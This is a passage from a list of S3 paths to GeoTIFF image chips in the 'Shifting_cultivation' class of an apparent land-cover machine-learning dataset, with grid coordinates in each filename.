's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4800_3100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4800_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4800_4200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4900_2000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4900_2100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4900_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4900_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4900_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4900_2900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4900_3000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4900_3100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4900_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4900_4200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4900_4300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5000_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5000_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5000_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5000_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5000_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5000_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5000_4200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5000_4300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5100_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5100_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5100_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5100_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5100_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5100_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5100_4200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5100_4300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5200_1900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5200_2000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5200_2100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5200_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5200_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5200_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5200_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5200_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5200_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5200_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5300_1900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5300_2000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5300_2100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5300_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5300_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5300_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5300_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5300_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5300_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5300_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5300_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5300_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5300_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5400_1600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5400_1700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5400_1800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5400_1900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5400_2000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5400_2100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5400_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5400_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5400_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5400_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5400_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5400_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5400_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5400_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5400_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5500_1600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5500_1700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5500_1800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5500_1900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5500_2000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5500_2100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5500_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5500_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5500_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5500_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5500_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5500_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5500_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5500_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_1600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_1700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_1800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_1900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_2000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_2100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5600_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_1700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_1800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_1900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_2000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_2100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5700_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5800_1800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5800_1900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5800_2000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5800_2100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5800_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5800_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5800_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5800_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5800_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5800_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5800_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5800_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5800_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5800_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5900_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5900_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5900_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5900_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5900_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5900_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_5900_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6000_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6000_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6000_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6000_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6000_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6000_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6000_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6000_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6000_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6000_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_600_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_600_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_600_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_600_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_600_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6100_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6100_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6100_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6100_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6100_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6100_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6100_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6100_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6100_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6100_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6100_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6200_2100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6200_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6200_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6200_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6200_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6200_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6200_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6200_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6200_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6300_2200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6300_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6300_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6300_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6300_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6300_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6300_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6300_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6300_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6400_2300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6400_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6400_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6400_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6400_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6400_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6400_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6400_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6400_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6400_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6500_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6500_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6500_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6500_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6500_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6500_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6500_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6500_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6500_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6600_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6600_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6600_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6600_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6600_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6600_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6600_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6600_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6700_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6700_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6700_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6700_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6700_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6700_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6700_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6700_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6700_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6800_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6800_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6800_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6800_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_6800_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_7000_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_7000_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_7000_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_700_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_700_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_700_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_700_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_700_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_700_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_7100_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_7100_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_7100_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_7200_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_7200_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_7200_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_7200_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_7300_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_7500_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_7500_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_7600_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_7600_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_7700_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_800_3500.tif', 